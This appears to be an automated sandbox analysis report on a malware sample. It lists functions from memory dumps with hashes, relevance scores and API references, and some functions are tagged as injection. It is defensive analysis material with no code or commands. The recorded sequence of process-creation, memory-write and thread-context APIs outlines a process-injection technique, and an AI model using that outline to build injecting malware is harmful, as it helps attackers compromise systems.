Opcode ID: bc87be393106813abb808392640e3637831648c34435e7f2fad6972b805069fd
Instruction ID: 2c4b8e8bc43cbbc3440c60a63fb5884ef5fabc91d7102d701776ff46d1d96dc2
Opcode Fuzzy Hash: bc87be393106813abb808392640e3637831648c34435e7f2fad6972b805069fd
Instruction Fuzzy Hash: 76B1AF71A11249DFCB44DFA9E494A8DBBF1FB88305B50C469E405EB374EB35AA42CF14

Uniqueness

Uniqueness Score: -1.00%

Function 08C34098 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad213f15ef2517d406888b3b59feda699f9f06bcff15f285d204281b80c8da2c
Instruction ID: 6ad3d2e2db59434cbeea1229699cdd338a0db808b8eb11428eefa13f73109926
Opcode Fuzzy Hash: ad213f15ef2517d406888b3b59feda699f9f06bcff15f285d204281b80c8da2c
Instruction Fuzzy Hash: B8A1AD71A11245DFCB44EFA9E494A8DBBF2FB88305B50C469E405EB364EB35EA42CF14

Uniqueness

Uniqueness Score: -1.00%

Function 08C38179 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31192021fe4443ef633cdecd5556193011b852edacbcdf83e1172a5a51512941
Instruction ID: 8d4c9b64b1262272e26bd43043158d6d23684ab6ea0deac27ac428798c4fb8ef
Opcode Fuzzy Hash: 31192021fe4443ef633cdecd5556193011b852edacbcdf83e1172a5a51512941
Instruction Fuzzy Hash: A3914974E15219DFCB04CFAAE4415AEBBF2FF88341F10942AE415E7358D734AA028FA4

Uniqueness

Uniqueness Score: -1.00%

Function 08C38460 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17d938215126a188b4a4d01c969ace78ef4726a969681d804a822ff8a5fceaeb
Instruction ID: 4bd7df1ebe9d27de087b7c15aa93899f9f038a36ca5dd0306a2f67908efaacd7
Opcode Fuzzy Hash: 17d938215126a188b4a4d01c969ace78ef4726a969681d804a822ff8a5fceaeb
Instruction Fuzzy Hash: 72613F70D1A22CEFCB14CFA6E5906DEFBB2FB89311F24942AE015B7345D3349A468B14

Uniqueness

Uniqueness Score: -1.00%

Function 07666573 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a30e3ecfc59841476a44d350594af4ad7076040636096c9ef4246f91f3984cb
Instruction ID: 5c4173c8298f684a3418e6cfb6819c68c456aebc304da38814b852ceaf22e53f
Opcode Fuzzy Hash: 1a30e3ecfc59841476a44d350594af4ad7076040636096c9ef4246f91f3984cb
Instruction Fuzzy Hash: 3351E3B4E012199FCB04CFA9D985AAEFBB2FF88304F18C569E409A7355D7349942CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0766CB51 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27044dd59fe6743a9763d0e23be78aa72b502392ecdd686f21e783ab7e9655e1
Instruction ID: e742767de0e4be1a2e00ed185bb07e62bdd674fb099a2b21b3403b0fb5dd017e
Opcode Fuzzy Hash: 27044dd59fe6743a9763d0e23be78aa72b502392ecdd686f21e783ab7e9655e1
Instruction Fuzzy Hash: D15129B4E046198FDB08CFAAC9446AEFBF2BF89300F14D16AD45AB7254D7385941CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 08C30CB0 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 370e9e1cae3fc389be1494121817ffa94430c0d06ada339e33c1b2ef1a44ac8d
Instruction ID: b7214e3132010709688c003c89749cb85eacded154c2e41a5a76b54c6dc62eb0
Opcode Fuzzy Hash: 370e9e1cae3fc389be1494121817ffa94430c0d06ada339e33c1b2ef1a44ac8d
Instruction Fuzzy Hash: E141DA71E006299FDB58CF6AC94068EFBF3BF89301F04C5A9D408A7225D7309A86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0766B428 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b86e1beb41ea2cdf4b6bf15e5efc41d91d6846db0685a84745257df9423307a5
Instruction ID: d73176000c5735ff4ab780fae42fbe56f493dbf911c528eb1bf2b0ac033e9017
Opcode Fuzzy Hash: b86e1beb41ea2cdf4b6bf15e5efc41d91d6846db0685a84745257df9423307a5
Instruction Fuzzy Hash: C331FCB1E00618CFEB18DFAAD85469EBBF3AFC9200F14C0AAD40DA7264DB3459458F61

Uniqueness

Uniqueness Score: -1.00%

Function 08C3B280 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6be0dd1eb4db595fac3d8eacefdab7478a52606cdfdf9f04b8f0a8c90e2777b4
Instruction ID: e0915463601b2daa81f660f271df61c1abf838ba1d4dd1f0c52eea45b9428ea6
Opcode Fuzzy Hash: 6be0dd1eb4db595fac3d8eacefdab7478a52606cdfdf9f04b8f0a8c90e2777b4
Instruction Fuzzy Hash: 6A216B30D09228DECB04CFA6D854BFEBBF5AF4A352F10912AE415B3251CB348942CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0766D531 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14ad8fabf7e44235c949b72165ac171db8a275b10f376cbef6f73b545f02c4fc
Instruction ID: 4cd058b425d4fd8d75cd2bfb782c6bcdad4116db611ebc6b3bfb61e9e5411331
Opcode Fuzzy Hash: 14ad8fabf7e44235c949b72165ac171db8a275b10f376cbef6f73b545f02c4fc
Instruction Fuzzy Hash: 20312BB1E046188BDB18CFAAD8443DEBBB3AFC8310F14C16AD409A7254DB350949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05B7C41B Relevance: 5.1, Strings: 4, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 05B7C4EC
U, xrefs: 05B7C45E
U, xrefs: 05B7C4FE
U, xrefs: 05B7C491

Memory Dump Source

Source File: 0000000F.00000002.595866553.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5b70000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: U$U$U$U
API String ID: 0-963019868
Opcode ID: 5ae00fdb4fb2d4b814888ae5ae3181d4c59af5c2fc6d1338dd45f6d2d618348d
Instruction ID: 1a9429c97cdae281af5e0756098100b967d86cb2c6b0277bf843cdb2c5216e79
Opcode Fuzzy Hash: 5ae00fdb4fb2d4b814888ae5ae3181d4c59af5c2fc6d1338dd45f6d2d618348d
Instruction Fuzzy Hash: AC418371A04148AFCB14EBB4D8557AE7BB2EFC4305F2081ADD41AAB390DF35AE41C791

Uniqueness

Uniqueness Score: -1.00%

Function 05B7CE71 Relevance: 3.9, Strings: 3, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 05B7CF9A
U, xrefs: 05B7CFAF
U, xrefs: 05B7CF12

Memory Dump Source

Source File: 0000000F.00000002.595866553.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5b70000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: U$U$U
API String ID: 0-3670060601
Opcode ID: 0dc26a8fa1ba8c554a9bd206d3a2f986ae567646d88ea5517af8c77b49e0b0d2
Instruction ID: e25bd82103128863da66a363bb8631f69a1af2db0196655c97f1701bb27830a6
Opcode Fuzzy Hash: 0dc26a8fa1ba8c554a9bd206d3a2f986ae567646d88ea5517af8c77b49e0b0d2
Instruction Fuzzy Hash: C841BE75F006159FCB08EBB5841526EB6E7AFC9608F24C47DD00AEB395DF35AD028BA1

Uniqueness

Uniqueness Score: -1.00%

Function 05B7B5E0 Relevance: 3.9, Strings: 3, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 05B7B711
U, xrefs: 05B7B674
U, xrefs: 05B7B6FC

Memory Dump Source

Source File: 0000000F.00000002.595866553.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5b70000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: U$U$U
API String ID: 0-3670060601
Opcode ID: 8b9cb2ec5245588e4e8fe44d9bb7145847ff8af54024482eb1edfa6981f5e4b3
Instruction ID: e5f01406604a19d2fd0879f03ff12e3ff265f6c9c52684f232152ec29d576470
Opcode Fuzzy Hash: 8b9cb2ec5245588e4e8fe44d9bb7145847ff8af54024482eb1edfa6981f5e4b3
Instruction Fuzzy Hash: A731C275F005155FCB08EB79841426EB6E7EFC8604F24C42DD40AE7395EF34AE028BA5

Uniqueness

Uniqueness Score: -1.00%

Function 07661A62 Relevance: 2.8, Strings: 2, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 07661C2D
U, xrefs: 07661BFA

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: U$U
API String ID: 0-3302002139
Opcode ID: 6bd1aa87eb5cf4343c7f860d04319c256167499ff95a7c3438cdf58df3ac64e1
Instruction ID: 00b0f2eba34834d3155b5a21234a3744a93c41ff124c7d841e08db20a61e65e3
Opcode Fuzzy Hash: 6bd1aa87eb5cf4343c7f860d04319c256167499ff95a7c3438cdf58df3ac64e1
Instruction Fuzzy Hash: C4919FB0B0050A9FCB18DFA5C8495AEBBF2FF89300F504469E416E7350EB30A952CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05B74CA8 Relevance: 1.7, Strings: 1, Instructions: 467
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x{`, xrefs: 05B750EC

Memory Dump Source

Source File: 0000000F.00000002.595866553.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5b70000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: x{`
API String ID: 0-4124675307
Opcode ID: a22b040f77d72831f8902da307b292e5e97528e2e063b07f48d9b05c65baaf09
Instruction ID: e3aa75803173f2b995c8da95988d217b0fca293979388bd76ff8771a41b47d73
Opcode Fuzzy Hash: a22b040f77d72831f8902da307b292e5e97528e2e063b07f48d9b05c65baaf09
Instruction Fuzzy Hash: 0DE1BF303446098FDB289A38C959B3976A7FF81606F1940E9E127CF3E1EF29EC418761

Uniqueness

Uniqueness Score: -1.00%

Function 08C39D48 Relevance: 1.6, APIs: 1, Instructions: 143
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 08C39E9B

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: cd2595414dda8ecfa2c288b7bd62251e0de30d39d578561ed83c092f0a255517
Instruction ID: 716feae1aca7dfe6af72f5df85657ce5e8cd599c7aa18347b574ea6f1870e8c3
Opcode Fuzzy Hash: cd2595414dda8ecfa2c288b7bd62251e0de30d39d578561ed83c092f0a255517
Instruction Fuzzy Hash: 15510771900329DFDB20CF99C880BDDBBB5BF89314F148099E848B7250DB719A89CF61

Uniqueness

Uniqueness Score: -1.00%

Function 08C3A940 Relevance: 1.6, APIs: 1, Instructions: 65
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08C3A9CD

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ebc068cff23ec662187abdfcb1600baeb75eb767a077ac63330b638cb8bfe38f
Instruction ID: 74249141c336d4095b4306cac0e430df5e73ca5455f8edeed2619e69570c5521
Opcode Fuzzy Hash: ebc068cff23ec662187abdfcb1600baeb75eb767a077ac63330b638cb8bfe38f
Instruction Fuzzy Hash: C02114B19003599FCB10CF9AC885BDEBBF4FB48314F10842AE958A3340D778A955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 08C33EFF Relevance: 1.6, APIs: 1, Instructions: 63
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 08C33EC3

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b2ffb39d7793ad30bfa55762a9b64c7e5c124ae3537359a79e24da9c911718fd
Instruction ID: 9a9ea7870b9b6a2cad36e6061836d1761fccd7b7724dc8014b3f7da60d2c6473
Opcode Fuzzy Hash: b2ffb39d7793ad30bfa55762a9b64c7e5c124ae3537359a79e24da9c911718fd
Instruction Fuzzy Hash: 6F21ACB5900258EFCB11DFA9E8047DEBFF4FB58320F00809AE858A7251C3389656DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 08C3A7C8 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08C3A847

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: aebfded380c605507b7545639a7ab9e65a6f867a3860b9c89a17a3913c1dc554
Instruction ID: 38836ebbda9a499c31feec3794a1eaa5d65903d8805c6462890e86d9f2b6cc21
Opcode Fuzzy Hash: aebfded380c605507b7545639a7ab9e65a6f867a3860b9c89a17a3913c1dc554
Instruction Fuzzy Hash: E221F0B19002599FCB10CF9AD884ADEBBF4FB48324F10842AE958A3250D338A555CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 08C3A708 Relevance: 1.6, APIs: 1, Instructions: 58
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 08C3A77F

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 7cc7f2d9bc29ea91f8b077365790428b3ccfadc2a08915bc850c262df5c41d9c
Instruction ID: afeb5b77333c068f671d14acc2ffdc6c66ee74b678af263a9f0355904c698ba3
Opcode Fuzzy Hash: 7cc7f2d9bc29ea91f8b077365790428b3ccfadc2a08915bc850c262df5c41d9c
Instruction Fuzzy Hash: BE2108B1D0062A9FCB10CF9AC4857DEFBF8BB49724F54812AD458A3340D778A9558FA1

Uniqueness

Uniqueness Score: -1.00%

Function 08C33E48 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 08C33EC3

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d3ac6943c463e4336010c8efec5241cfdac65ce21731135670188be8a843dc18
Instruction ID: 2cc0e1465749dcb57f8b046acc467048cc08e07b632452bb6ec31a075a2b8176
Opcode Fuzzy Hash: d3ac6943c463e4336010c8efec5241cfdac65ce21731135670188be8a843dc18
Instruction Fuzzy Hash: B72108B5D002499FCB10CF9AD484BDEFBF5BB48324F148429E858A7240D3789655CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 08C33E50 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 08C33EC3

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a9f704aded7dc1ef20d840ce8cc428e706825ce432bddcfa066fc37ab7c0c537
Instruction ID: bcfc0156685c1b0e19dccd4b7b18892abcf0ed62ac35bf8408568660427063b6
Opcode Fuzzy Hash: a9f704aded7dc1ef20d840ce8cc428e706825ce432bddcfa066fc37ab7c0c537
Instruction Fuzzy Hash: 2A21E7B59002499FCB10CF9AD484BDEFBF4FB48324F108429E958A7350D778A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 08C3A898 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08C3A903

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0275465656272aca5d8379fc02c91a148a7bdd0763a12ab0133dc2f78110ea49
Instruction ID: 75827e73f6fd5de4b1186a8524e812f5aee9d3aa5bbca8361cb0a8e02f9573a3
Opcode Fuzzy Hash: 0275465656272aca5d8379fc02c91a148a7bdd0763a12ab0133dc2f78110ea49
Instruction Fuzzy Hash: 381125B5800259DFCB10CF9AC884BDFBBF8FB48324F108419E568A7210C335A554CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 08C3AE18 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 08C3AE75

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 134fbec93c54e9018d17e94afdf428ba1b05e7e94ae659ebc18bb8d12eec6db8
Instruction ID: 022c3e63380460547bc58d1db1ecca09c921bab9fccd8bbcee6abf0106b6d26d
Opcode Fuzzy Hash: 134fbec93c54e9018d17e94afdf428ba1b05e7e94ae659ebc18bb8d12eec6db8
Instruction Fuzzy Hash: A811D0B58002599FDB10CF9AD885BDFBBF8EB48324F10881AE954A7600C375A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 08C3AAF8 Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 08C3AB57

Memory Dump Source

Source File: 0000000F.00000002.605675715.0000000008C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8c30000_PROMZwFp385vXrN.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0014240d1f7c56f69de7e934486822f3e8c40bdba9ec0ebbe70bde9e9cd27370
Instruction ID: ff68a45e4867087a9c5444a3f9ae9db4ba6cf7b901dfdd7771a4956146a7a42b
Opcode Fuzzy Hash: 0014240d1f7c56f69de7e934486822f3e8c40bdba9ec0ebbe70bde9e9cd27370
Instruction Fuzzy Hash: 481112B18006598FCB10CF9AD484BDEFBF8EB48328F20881AD569B3350C774A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07662388 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

U, xrefs: 076623D6

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3819925966
Opcode ID: 0a11802f2e09a0c9090e020a6ea151c907d00a3b9ee05fc8da17fdab37de90b2
Instruction ID: b99d1fb9d538842bb2f483ef23bed3dc403e2f753b0263bd7924afc88920a46d
Opcode Fuzzy Hash: 0a11802f2e09a0c9090e020a6ea151c907d00a3b9ee05fc8da17fdab37de90b2
Instruction Fuzzy Hash: 6EA1D1B0B002059FCB11DF68C4A48ADBBF2FF89310BA58469D44AF7351DB35AD46CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 05B7C940 Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

U, xrefs: 05B7CB0C

Memory Dump Source

Source File: 0000000F.00000002.595866553.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5b70000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3819925966
Opcode ID: 1149ef5ebe7fdf6cf9ae4497b632dfa05bc822efcf6e40a4845dea99d33cb418
Instruction ID: f91b4fd776974ac5fadcbeda92da3934a23cfcd843e572b30b367a00a8c4ddf6
Opcode Fuzzy Hash: 1149ef5ebe7fdf6cf9ae4497b632dfa05bc822efcf6e40a4845dea99d33cb418
Instruction Fuzzy Hash: BC61DF31B006098FDB14EBA5C4946BEBBB2EFC4304F14896ED01AA7365DF74AD46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05B7FF60 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

$%|`, xrefs: 05B7FEF7

Memory Dump Source

Source File: 0000000F.00000002.595866553.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5b70000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: $%|`
API String ID: 0-4272567516
Opcode ID: 85acb15e04dbb46e4e5ec0096133b6b761e1e2e1816b8571ec620289cd49c433
Instruction ID: 837a69fc51d1874ba63913e9f9db55f7cee8492dab2ed5c0791e81c3f96d280f
Opcode Fuzzy Hash: 85acb15e04dbb46e4e5ec0096133b6b761e1e2e1816b8571ec620289cd49c433
Instruction Fuzzy Hash: DF21B33670A6489FC7159B68E8557797BA5FF86205F1400FAE029CB361DF71E801CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0766E9D9 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

#ot, xrefs: 0766EA25

Memory Dump Source

Source File: 0000000F.00000002.603576430.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7660000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: #ot
API String ID: 0-1457675709
Opcode ID: fbe0000e4465ed5670c877d1798b418da23df230a160681cfc0e22b89efaf7d3
Instruction ID: f8efc9fd4b1b37bf18ec4b5de3ae139ae1601959b836fb12c49f974036ad5413
Opcode Fuzzy Hash: fbe0000e4465ed5670c877d1798b418da23df230a160681cfc0e22b89efaf7d3
Instruction Fuzzy Hash: 9F3138B4E1520ADFCB04CFAAD5455AEBBF2BF89300F14D9AAC405AB350E7309A019B91

Uniqueness

Uniqueness Score: -1.00%

Function 05B774C8 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

$%|`, xrefs: 05B7750D

Memory Dump Source

Source File: 0000000F.00000002.595866553.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5b70000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: $%|`
API String ID: 0-4272567516
Opcode ID: 41ce0aac5ff8ed73446ebe50d50d73d9ab96b5e719992f16cda22f2de82cc7d8
Instruction ID: ff1b43ec3542089837cee53f799bc46feb94a20d7d00db083b2a42b71e0ac79e
Opcode Fuzzy Hash: 41ce0aac5ff8ed73446ebe50d50d73d9ab96b5e719992f16cda22f2de82cc7d8
Instruction Fuzzy Hash: 2701DBB1A45108DFCB44EB74E855AADB7B5EB45304F5011D8D40963391DF30AE41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 05B774D8 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

$%|`, xrefs: 05B7750D

Memory Dump Source

Source File: 0000000F.00000002.595866553.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5b70000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID: $%|`
API String ID: 0-4272567516
Opcode ID: 0e3b8dedd1aa57a6e07423f81b5904cde43a11ef9024f73f5a1b6ef75e42c99a
Instruction ID: 3fbfcc06bee0eafa973dbaa35a738536f125a36bd5958945d14ea360847e38e3
Opcode Fuzzy Hash: 0e3b8dedd1aa57a6e07423f81b5904cde43a11ef9024f73f5a1b6ef75e42c99a
Instruction Fuzzy Hash: 15F04470A4510CEFCB44EBB4E955AADBBBAFB49204F6051E9D41A63391DF306E41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 05B73570 Relevance: .6, Instructions: 632COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.595866553.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5b70000_PROMZwFp385vXrN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f99d227f16c35b237d18a9b4058121281953e6703b647fdf0661a6bddcdf1a95
Instruction ID: f99c382aa77789b5353170c755d864903c52b2006bb09bac816b687096f15dde
Opcode Fuzzy Hash: f99d227f16c35b237d18a9b4058121281953e6703b647fdf0661a6bddcdf1a95
Instruction Fuzzy Hash: 77425D75604209DFCB14CF68C988EAABBF2FF88314F158995E4269B3A1D731F940DB61

Uniqueness

